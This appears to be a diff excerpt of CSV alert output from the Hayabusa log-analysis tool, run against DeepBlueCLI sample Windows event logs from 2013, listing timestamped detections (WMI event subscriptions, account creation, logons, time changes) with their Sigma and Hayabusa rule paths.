+2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser  :  SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser  :  SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3463664321-2923530833-3546627382-1000  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3463664321-2923530833-3546627382-1000  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: WIN-QALA5Q3KJ43  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x298c5  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: WIN-QALA5Q3KJ43  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x29908  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x57d5b  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x57d8d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
